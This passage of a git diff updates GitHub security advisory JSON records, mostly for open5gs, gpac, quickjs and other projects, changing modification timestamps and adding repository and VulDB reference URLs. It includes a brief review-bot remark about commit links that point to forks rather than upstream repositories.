 "published": "2026-01-29T15:30:27Z",
 "aliases": [
 "CVE-2026-1586"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/issues/4273#issue-3796030721"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.343349"
diff --git a/advisories/unreviewed/2026/01/GHSA-6fpp-9pqw-wr8m/GHSA-6fpp-9pqw-wr8m.json b/advisories/unreviewed/2026/01/GHSA-6fpp-9pqw-wr8m/GHSA-6fpp-9pqw-wr8m.json
index 0327682f12676..3f946500be950 100644
--- a/advisories/unreviewed/2026/01/GHSA-6fpp-9pqw-wr8m/GHSA-6fpp-9pqw-wr8m.json
+++ b/advisories/unreviewed/2026/01/GHSA-6fpp-9pqw-wr8m/GHSA-6fpp-9pqw-wr8m.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-6fpp-9pqw-wr8m",
- "modified": "2026-01-05T03:30:27Z",
+ "modified": "2026-02-23T09:31:19Z",
 "published": "2026-01-05T03:30:27Z",
 "aliases": [
 "CVE-2025-15454"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://gist.github.com/youremailaddress/cba7c19a4eafcb326d0e912adf132be3#proof-of-concept"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/zhanglun/lettura"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.339487"
diff --git a/advisories/unreviewed/2026/01/GHSA-6q3r-7qmf-2jrm/GHSA-6q3r-7qmf-2jrm.json b/advisories/unreviewed/2026/01/GHSA-6q3r-7qmf-2jrm/GHSA-6q3r-7qmf-2jrm.json
index 35b81587bb40d..5f07840377a20 100644
--- a/advisories/unreviewed/2026/01/GHSA-6q3r-7qmf-2jrm/GHSA-6q3r-7qmf-2jrm.json
+++ b/advisories/unreviewed/2026/01/GHSA-6q3r-7qmf-2jrm/GHSA-6q3r-7qmf-2jrm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-6q3r-7qmf-2jrm",
- "modified": "2026-01-02T09:30:27Z",
+ "modified": "2026-02-23T09:31:19Z",
 "published": "2026-01-02T09:30:27Z",
 "aliases": [
 "CVE-2025-15437"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://github.com/LigeroSmart/ligerosmart/commit/264ac5b2be5b3c673ebd8cb862e673f5d300d9a7"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LigeroSmart/ligerosmart"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/LigeroSmart/ligerosmart/releases/tag/6.1.26"
diff --git a/advisories/unreviewed/2026/01/GHSA-74rr-mvxh-jvg7/GHSA-74rr-mvxh-jvg7.json b/advisories/unreviewed/2026/01/GHSA-74rr-mvxh-jvg7/GHSA-74rr-mvxh-jvg7.json
index 5954cdd08b1d6..1b0ed1059d4fd 100644
--- a/advisories/unreviewed/2026/01/GHSA-74rr-mvxh-jvg7/GHSA-74rr-mvxh-jvg7.json
+++ b/advisories/unreviewed/2026/01/GHSA-74rr-mvxh-jvg7/GHSA-74rr-mvxh-jvg7.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-74rr-mvxh-jvg7",
- "modified": "2026-01-19T21:33:11Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-19T21:33:11Z",
 "aliases": [
 "CVE-2026-1172"
@@ -27,6 +27,10 @@
 "type": "WEB",
 "url": "https://github.com/birkir/prime/issues/543"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/birkir/prime"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341766"
diff --git a/advisories/unreviewed/2026/01/GHSA-79xr-h873-2v98/GHSA-79xr-h873-2v98.json b/advisories/unreviewed/2026/01/GHSA-79xr-h873-2v98/GHSA-79xr-h873-2v98.json
index 8da702d5e6782..af0422f0f3604 100644
--- a/advisories/unreviewed/2026/01/GHSA-79xr-h873-2v98/GHSA-79xr-h873-2v98.json
+++ b/advisories/unreviewed/2026/01/GHSA-79xr-h873-2v98/GHSA-79xr-h873-2v98.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-79xr-h873-2v98",
- "modified": "2026-01-19T21:33:12Z",
+ "modified": "2026-02-23T09:31:22Z",
 "published": "2026-01-19T21:33:11Z",
 "aliases": [
 "CVE-2026-1174"
@@ -27,6 +27,10 @@
 "type": "WEB",
 "url": "https://github.com/birkir/prime/issues/545"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/birkir/prime"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341768"
diff --git a/advisories/unreviewed/2026/01/GHSA-7x8v-q8wp-hcg7/GHSA-7x8v-q8wp-hcg7.json b/advisories/unreviewed/2026/01/GHSA-7x8v-q8wp-hcg7/GHSA-7x8v-q8wp-hcg7.json
index 28466fcb95fd9..2a5ed9b0b89d3 100644
--- a/advisories/unreviewed/2026/01/GHSA-7x8v-q8wp-hcg7/GHSA-7x8v-q8wp-hcg7.json
+++ b/advisories/unreviewed/2026/01/GHSA-7x8v-q8wp-hcg7/GHSA-7x8v-q8wp-hcg7.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7x8v-q8wp-hcg7",
- "modified": "2026-01-19T21:33:11Z",
+ "modified": "2026-02-23T09:31:22Z",
 "published": "2026-01-19T21:33:11Z",
 "aliases": [
 "CVE-2026-1173"
@@ -27,6 +27,10 @@
 "type": "WEB",
 "url": "https://github.com/birkir/prime/issues/544"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/birkir/prime"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341767"
diff --git a/advisories/unreviewed/2026/01/GHSA-8gqc-w5g5-j344/GHSA-8gqc-w5g5-j344.json b/advisories/unreviewed/2026/01/GHSA-8gqc-w5g5-j344/GHSA-8gqc-w5g5-j344.json
index 667e29df1da16..d86e534f394e4 100644
--- a/advisories/unreviewed/2026/01/GHSA-8gqc-w5g5-j344/GHSA-8gqc-w5g5-j344.json
+++ b/advisories/unreviewed/2026/01/GHSA-8gqc-w5g5-j344/GHSA-8gqc-w5g5-j344.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8gqc-w5g5-j344",
- "modified": "2026-01-28T15:31:31Z",
+ "modified": "2026-02-23T09:31:22Z",
 "published": "2026-01-28T15:31:31Z",
 "aliases": [
 "CVE-2026-1521"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/69b53add90a9479d7960b822fc60601d659c328b"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.343192"
diff --git a/advisories/unreviewed/2026/01/GHSA-8whh-2x7g-j9cx/GHSA-8whh-2x7g-j9cx.json b/advisories/unreviewed/2026/01/GHSA-8whh-2x7g-j9cx/GHSA-8whh-2x7g-j9cx.json
index 3c0033f3cd89d..cb8d36e2c3a47 100644
--- a/advisories/unreviewed/2026/01/GHSA-8whh-2x7g-j9cx/GHSA-8whh-2x7g-j9cx.json
+++ b/advisories/unreviewed/2026/01/GHSA-8whh-2x7g-j9cx/GHSA-8whh-2x7g-j9cx.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8whh-2x7g-j9cx",
- "modified": "2026-01-18T18:30:16Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-18T18:30:16Z",
 "aliases": [
 "CVE-2026-1125"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://vuldb.com/?submit.734966"
 },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.743503"
+ },
 {
 "type": "WEB",
 "url": "https://www.dlink.com"
diff --git a/advisories/unreviewed/2026/01/GHSA-9438-qf7w-49rg/GHSA-9438-qf7w-49rg.json b/advisories/unreviewed/2026/01/GHSA-9438-qf7w-49rg/GHSA-9438-qf7w-49rg.json
index 81e384ab13a80..99fd51b149c94 100644
--- a/advisories/unreviewed/2026/01/GHSA-9438-qf7w-49rg/GHSA-9438-qf7w-49rg.json
+++ b/advisories/unreviewed/2026/01/GHSA-9438-qf7w-49rg/GHSA-9438-qf7w-49rg.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9438-qf7w-49rg",
- "modified": "2026-01-26T06:30:28Z",
+ "modified": "2026-02-23T09:31:22Z",
 "published": "2026-01-26T06:30:28Z",
 "aliases": [
 "CVE-2026-1417"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://github.com/enocknt/gpac/commit/f96bd57c3ccdcde4335a0be28cd3e8fe296993de"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/gpac/gpac"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.342806"
diff --git a/advisories/unreviewed/2026/01/GHSA-9g9c-c6jm-98g4/GHSA-9g9c-c6jm-98g4.json b/advisories/unreviewed/2026/01/GHSA-9g9c-c6jm-98g4/GHSA-9g9c-c6jm-98g4.json
index 0ea1c1f3305e3..6f76eab065bef 100644
--- a/advisories/unreviewed/2026/01/GHSA-9g9c-c6jm-98g4/GHSA-9g9c-c6jm-98g4.json
+++ b/advisories/unreviewed/2026/01/GHSA-9g9c-c6jm-98g4/GHSA-9g9c-c6jm-98g4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9g9c-c6jm-98g4",
- "modified": "2026-01-19T00:30:14Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-19T00:30:14Z",
 "aliases": [
 "CVE-2025-15539"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/b4707272c1caf6a7d4dca905694ea55557a0545f"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341732"
diff --git a/advisories/unreviewed/2026/01/GHSA-c99x-xcf4-fhgm/GHSA-c99x-xcf4-fhgm.json b/advisories/unreviewed/2026/01/GHSA-c99x-xcf4-fhgm/GHSA-c99x-xcf4-fhgm.json
index 032a85c029a20..d027dbc65209c 100644
--- a/advisories/unreviewed/2026/01/GHSA-c99x-xcf4-fhgm/GHSA-c99x-xcf4-fhgm.json
+++ b/advisories/unreviewed/2026/01/GHSA-c99x-xcf4-fhgm/GHSA-c99x-xcf4-fhgm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c99x-xcf4-fhgm",
- "modified": "2026-01-09T18:31:37Z",
+ "modified": "2026-02-23T09:31:19Z",
 "published": "2026-01-09T18:31:37Z",
 "aliases": [
 "CVE-2025-15496"
@@ -31,6 +31,10 @@
 "type": "WEB",
 "url": "https://github.com/guchengwuyue/yshopmall/issues/39#issue-3769727898"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/guchengwuyue/yshopmall"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.340274"
diff --git a/advisories/unreviewed/2026/01/GHSA-c9rh-2qq3-frxv/GHSA-c9rh-2qq3-frxv.json b/advisories/unreviewed/2026/01/GHSA-c9rh-2qq3-frxv/GHSA-c9rh-2qq3-frxv.json
index 7362ca4f7f791..8739c5203d0c5 100644
--- a/advisories/unreviewed/2026/01/GHSA-c9rh-2qq3-frxv/GHSA-c9rh-2qq3-frxv.json
+++ b/advisories/unreviewed/2026/01/GHSA-c9rh-2qq3-frxv/GHSA-c9rh-2qq3-frxv.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c9rh-2qq3-frxv",
- "modified": "2026-01-02T09:30:27Z",
+ "modified": "2026-02-23T09:31:19Z",
 "published": "2026-01-02T09:30:27Z",
 "aliases": [
 "CVE-2025-15432"
@@ -27,6 +27,10 @@
 "type": "WEB",
 "url": "https://github.com/yeqifu/carRental/issues/46"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/carRental"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.339354"
diff --git a/advisories/unreviewed/2026/01/GHSA-f679-6xgj-qqcg/GHSA-f679-6xgj-qqcg.json b/advisories/unreviewed/2026/01/GHSA-f679-6xgj-qqcg/GHSA-f679-6xgj-qqcg.json
index 81dcc04b6af1c..1113bdf28fbc7 100644
--- a/advisories/unreviewed/2026/01/GHSA-f679-6xgj-qqcg/GHSA-f679-6xgj-qqcg.json
+++ b/advisories/unreviewed/2026/01/GHSA-f679-6xgj-qqcg/GHSA-f679-6xgj-qqcg.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f679-6xgj-qqcg",
- "modified": "2026-01-08T09:30:18Z",
+ "modified": "2026-02-23T09:31:19Z",
 "published": "2026-01-08T09:30:18Z",
 "aliases": [
 "CVE-2026-0701"
@@ -42,6 +42,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.733002"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.733490"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/01/GHSA-fgq8-gvxr-ghw7/GHSA-fgq8-gvxr-ghw7.json b/advisories/unreviewed/2026/01/GHSA-fgq8-gvxr-ghw7/GHSA-fgq8-gvxr-ghw7.json
index ea111c0bee72f..a55967420b2dc 100644
--- a/advisories/unreviewed/2026/01/GHSA-fgq8-gvxr-ghw7/GHSA-fgq8-gvxr-ghw7.json
+++ b/advisories/unreviewed/2026/01/GHSA-fgq8-gvxr-ghw7/GHSA-fgq8-gvxr-ghw7.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fgq8-gvxr-ghw7",
- "modified": "2026-01-01T21:30:18Z",
+ "modified": "2026-02-23T09:31:18Z",
 "published": "2026-01-01T21:30:17Z",
 "aliases": [
 "CVE-2025-15413"
@@ -31,6 +31,10 @@
 "type": "WEB",
 "url": "https://github.com/wasm3/wasm3/issues/547"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/wasm3/wasm3"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.339334"
diff --git a/advisories/unreviewed/2026/01/GHSA-fprw-935f-f6f7/GHSA-fprw-935f-f6f7.json b/advisories/unreviewed/2026/01/GHSA-fprw-935f-f6f7/GHSA-fprw-935f-f6f7.json
index 80b440430bd61..3e4e349d88936 100644
--- a/advisories/unreviewed/2026/01/GHSA-fprw-935f-f6f7/GHSA-fprw-935f-f6f7.json
+++ b/advisories/unreviewed/2026/01/GHSA-fprw-935f-f6f7/GHSA-fprw-935f-f6f7.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fprw-935f-f6f7",
- "modified": "2026-01-02T03:30:22Z",
+ "modified": "2026-02-23T09:31:19Z",
 "published": "2026-01-02T03:30:22Z",
 "aliases": [
 "CVE-2025-15419"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/5aaa09907e7b9e0a326265a5f08d56f54280b5f2"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.339341"
diff --git a/advisories/unreviewed/2026/01/GHSA-g5rv-h647-hjj3/GHSA-g5rv-h647-hjj3.json b/advisories/unreviewed/2026/01/GHSA-g5rv-h647-hjj3/GHSA-g5rv-h647-hjj3.json
index 7622baf04be39..6f2560c0c1e3a 100644
--- a/advisories/unreviewed/2026/01/GHSA-g5rv-h647-hjj3/GHSA-g5rv-h647-hjj3.json
+++ b/advisories/unreviewed/2026/01/GHSA-g5rv-h647-hjj3/GHSA-g5rv-h647-hjj3.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-g5rv-h647-hjj3",
- "modified": "2026-01-18T06:30:22Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-18T06:30:22Z",
 "aliases": [
 "CVE-2025-15533"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/oneafter/1224/blob/main/hbf2"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/raysan5/raylib"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341705"
diff --git a/advisories/unreviewed/2026/01/GHSA-gq8r-4rr6-wr2q/GHSA-gq8r-4rr6-wr2q.json b/advisories/unreviewed/2026/01/GHSA-gq8r-4rr6-wr2q/GHSA-gq8r-4rr6-wr2q.json
index c12630076ed3b..251bd5ed692b9 100644
--- a/advisories/unreviewed/2026/01/GHSA-gq8r-4rr6-wr2q/GHSA-gq8r-4rr6-wr2q.json
+++ b/advisories/unreviewed/2026/01/GHSA-gq8r-4rr6-wr2q/GHSA-gq8r-4rr6-wr2q.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gq8r-4rr6-wr2q",
- "modified": "2026-01-02T00:30:25Z",
+ "modified": "2026-02-23T09:31:18Z",
 "published": "2026-01-02T00:30:25Z",
 "aliases": [
 "CVE-2025-15418"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/4e913d21f2c032b187815f063dbab5ebe65fe83a"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.339340"
diff --git a/advisories/unreviewed/2026/01/GHSA-grwh-fmhg-rqcq/GHSA-grwh-fmhg-rqcq.json b/advisories/unreviewed/2026/01/GHSA-grwh-fmhg-rqcq/GHSA-grwh-fmhg-rqcq.json
index dfb6d4573f511..8fceb5c6f8f5e 100644
--- a/advisories/unreviewed/2026/01/GHSA-grwh-fmhg-rqcq/GHSA-grwh-fmhg-rqcq.json
+++ b/advisories/unreviewed/2026/01/GHSA-grwh-fmhg-rqcq/GHSA-grwh-fmhg-rqcq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-grwh-fmhg-rqcq",
- "modified": "2026-01-19T18:30:28Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-19T18:30:28Z",
 "aliases": [
 "CVE-2026-1170"
@@ -27,6 +27,10 @@
 "type": "WEB",
 "url": "https://github.com/birkir/prime/issues/541"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/birkir/prime"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.341764"
diff --git a/advisories/unreviewed/2026/01/GHSA-h4jj-hgv3-ppwg/GHSA-h4jj-hgv3-ppwg.json b/advisories/unreviewed/2026/01/GHSA-h4jj-hgv3-ppwg/GHSA-h4jj-hgv3-ppwg.json
index 346ef7685facc..aa6c50d0183cc 100644
--- a/advisories/unreviewed/2026/01/GHSA-h4jj-hgv3-ppwg/GHSA-h4jj-hgv3-ppwg.json
+++ b/advisories/unreviewed/2026/01/GHSA-h4jj-hgv3-ppwg/GHSA-h4jj-hgv3-ppwg.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-h4jj-hgv3-ppwg",
- "modified": "2026-01-02T06:30:26Z",
+ "modified": "2026-02-23T09:31:19Z",
 "published": "2026-01-02T06:30:26Z",
 "aliases": [
 "CVE-2025-15431"
diff --git a/advisories/unreviewed/2026/01/GHSA-hqj6-7698-rxx4/GHSA-hqj6-7698-rxx4.json b/advisories/unreviewed/2026/01/GHSA-hqj6-7698-rxx4/GHSA-hqj6-7698-rxx4.json
index bd49fa9e2074f..d61ebb4b1fba1 100644
--- a/advisories/unreviewed/2026/01/GHSA-hqj6-7698-rxx4/GHSA-hqj6-7698-rxx4.json
+++ b/advisories/unreviewed/2026/01/GHSA-hqj6-7698-rxx4/GHSA-hqj6-7698-rxx4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hqj6-7698-rxx4",
- "modified": "2026-01-26T09:30:18Z",
+ "modified": "2026-02-23T09:31:22Z",
 "published": "2026-01-26T09:30:18Z",
 "aliases": [
 "CVE-2026-1425"
@@ -27,6 +27,10 @@
 "type": "WEB",
 "url": "https://github.com/pymumu/smartdns/commit/2d57c4b4e1add9b4537aeb403f794a084727e1c8"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pymumu/smartdns"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.342841"
diff --git a/advisories/unreviewed/2026/01/GHSA-j6q4-mvcw-hpgm/GHSA-j6q4-mvcw-hpgm.json b/advisories/unreviewed/2026/01/GHSA-j6q4-mvcw-hpgm/GHSA-j6q4-mvcw-hpgm.json
index 8f2f07c3715b2..f5306d5de9a7d 100644
--- a/advisories/unreviewed/2026/01/GHSA-j6q4-mvcw-hpgm/GHSA-j6q4-mvcw-hpgm.json
+++ b/advisories/unreviewed/2026/01/GHSA-j6q4-mvcw-hpgm/GHSA-j6q4-mvcw-hpgm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-j6q4-mvcw-hpgm",
- "modified": "2026-01-19T09:30:27Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-19T09:30:27Z",
 "aliases": [
 "CVE-2026-1141"
@@ -42,6 +42,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.735483"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.736668"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/01/GHSA-jqv9-g2ph-pfw9/GHSA-jqv9-g2ph-pfw9.json b/advisories/unreviewed/2026/01/GHSA-jqv9-g2ph-pfw9/GHSA-jqv9-g2ph-pfw9.json
index 6c9d7577f159f..9332129b72a2e 100644
--- a/advisories/unreviewed/2026/01/GHSA-jqv9-g2ph-pfw9/GHSA-jqv9-g2ph-pfw9.json
+++ b/advisories/unreviewed/2026/01/GHSA-jqv9-g2ph-pfw9/GHSA-jqv9-g2ph-pfw9.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jqv9-g2ph-pfw9",
- "modified": "2026-01-19T09:30:28Z",
+ "modified": "2026-02-23T09:31:21Z",
 "published": "2026-01-19T09:30:28Z",
 "aliases": [
 "CVE-2026-1145"
@@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/paralin/quickjs/commit/53aebe66170d545bb6265906fe4324e4477de8b4" }, + { + "type": "WEB", + "url": "https://github.com/quickjs-ng/quickjs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341738" diff --git a/advisories/unreviewed/2026/01/GHSA-jvvr-947r-5jcr/GHSA-jvvr-947r-5jcr.json b/advisories/unreviewed/2026/01/GHSA-jvvr-947r-5jcr/GHSA-jvvr-947r-5jcr.json index 50499ba3d227b..01460277852a0 100644 --- a/advisories/unreviewed/2026/01/GHSA-jvvr-947r-5jcr/GHSA-jvvr-947r-5jcr.json +++ b/advisories/unreviewed/2026/01/GHSA-jvvr-947r-5jcr/GHSA-jvvr-947r-5jcr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jvvr-947r-5jcr", - "modified": "2026-01-17T18:30:19Z", + "modified": "2026-02-23T09:31:20Z", "published": "2026-01-17T18:30:19Z", "aliases": [ "CVE-2026-1048" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/LigeroSmart/ligerosmart/issues/279#issue-3775562926" }, + { + "type": "WEB", + "url": "https://github.com/LigeroSmart/ligerosmart" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341600" diff --git a/advisories/unreviewed/2026/01/GHSA-m43m-9cwc-jq98/GHSA-m43m-9cwc-jq98.json b/advisories/unreviewed/2026/01/GHSA-m43m-9cwc-jq98/GHSA-m43m-9cwc-jq98.json index 7b089d611954a..c172a0f1c9848 100644 --- a/advisories/unreviewed/2026/01/GHSA-m43m-9cwc-jq98/GHSA-m43m-9cwc-jq98.json +++ b/advisories/unreviewed/2026/01/GHSA-m43m-9cwc-jq98/GHSA-m43m-9cwc-jq98.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m43m-9cwc-jq98", - "modified": "2026-01-18T12:31:06Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-18T12:31:06Z", "aliases": [ "CVE-2025-15537" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/mapnik/mapnik/issues/4543" }, + { + "type": "WEB", + "url": "https://github.com/mapnik/mapnik" + }, { "type": "WEB", "url": "https://github.com/oneafter/1218/blob/main/repro" 
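Review bot: The repository reference added in the first hunk on this line (GHSA-jqv9-g2ph-pfw9) is `https://github.com/quickjs-ng/quickjs`, while the fix commit kept as context just above it is addressed under `paralin/quickjs`, a different repository path and presumably a fork. A commit URL under a fork does not by itself show that the change landed upstream, so the record would be easier to verify with the commit referenced under the upstream path once that is confirmed. The gpac records GHSA-q4m9-3fr6-f83p and GHSA-r58r-mmgc-mr7f further down show the same pattern (`enocknt/gpac` commit, `gpac/gpac` repository).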
diff --git a/advisories/unreviewed/2026/01/GHSA-m9r7-9m8m-9f64/GHSA-m9r7-9m8m-9f64.json b/advisories/unreviewed/2026/01/GHSA-m9r7-9m8m-9f64/GHSA-m9r7-9m8m-9f64.json index 546a3ab14a7f0..7d224d05b54a9 100644 --- a/advisories/unreviewed/2026/01/GHSA-m9r7-9m8m-9f64/GHSA-m9r7-9m8m-9f64.json +++ b/advisories/unreviewed/2026/01/GHSA-m9r7-9m8m-9f64/GHSA-m9r7-9m8m-9f64.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m9r7-9m8m-9f64", - "modified": "2026-01-05T21:30:33Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-05T21:30:33Z", "aliases": [ "CVE-2026-0605" @@ -46,6 +46,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.731695" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.732595" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-mf3r-3jp8-f7f5/GHSA-mf3r-3jp8-f7f5.json b/advisories/unreviewed/2026/01/GHSA-mf3r-3jp8-f7f5/GHSA-mf3r-3jp8-f7f5.json index 0ea5c699256b0..15f1443f24fa1 100644 --- a/advisories/unreviewed/2026/01/GHSA-mf3r-3jp8-f7f5/GHSA-mf3r-3jp8-f7f5.json +++ b/advisories/unreviewed/2026/01/GHSA-mf3r-3jp8-f7f5/GHSA-mf3r-3jp8-f7f5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mf3r-3jp8-f7f5", - "modified": "2026-01-05T03:30:27Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-05T03:30:27Z", "aliases": [ "CVE-2025-15450" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/sfturing/hosp_order/issues/111#issue-3760306826" }, + { + "type": "WEB", + "url": "https://github.com/sfturing/hosp_order" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.339483" diff --git a/advisories/unreviewed/2026/01/GHSA-mp27-9vf3-rfc6/GHSA-mp27-9vf3-rfc6.json b/advisories/unreviewed/2026/01/GHSA-mp27-9vf3-rfc6/GHSA-mp27-9vf3-rfc6.json index 495d72b855695..28f00377ed3d2 100644 --- a/advisories/unreviewed/2026/01/GHSA-mp27-9vf3-rfc6/GHSA-mp27-9vf3-rfc6.json +++ b/advisories/unreviewed/2026/01/GHSA-mp27-9vf3-rfc6/GHSA-mp27-9vf3-rfc6.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mp27-9vf3-rfc6", - "modified": "2026-01-02T00:30:25Z", + "modified": "2026-02-23T09:31:18Z", "published": "2026-01-02T00:30:25Z", "aliases": [ "CVE-2025-15417" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/465273d13ba5d47b274c38c9d1b07f04859178a1" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.339339" diff --git a/advisories/unreviewed/2026/01/GHSA-mw2p-3c2q-3gxg/GHSA-mw2p-3c2q-3gxg.json b/advisories/unreviewed/2026/01/GHSA-mw2p-3c2q-3gxg/GHSA-mw2p-3c2q-3gxg.json index 94e147fb5b659..12fa0132d3f2b 100644 --- a/advisories/unreviewed/2026/01/GHSA-mw2p-3c2q-3gxg/GHSA-mw2p-3c2q-3gxg.json +++ b/advisories/unreviewed/2026/01/GHSA-mw2p-3c2q-3gxg/GHSA-mw2p-3c2q-3gxg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mw2p-3c2q-3gxg", - "modified": "2026-01-01T21:30:17Z", + "modified": "2026-02-23T09:31:18Z", "published": "2026-01-01T21:30:17Z", "aliases": [ "CVE-2025-15411" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/WebAssembly/wabt/issues/2679" }, + { + "type": "WEB", + "url": "https://github.com/WebAssembly/wabt" + }, { "type": "WEB", "url": "https://github.com/oneafter/1208/blob/main/af1" @@ -42,6 +46,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.719825" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.736404" } ], "database_specific": { diff --git 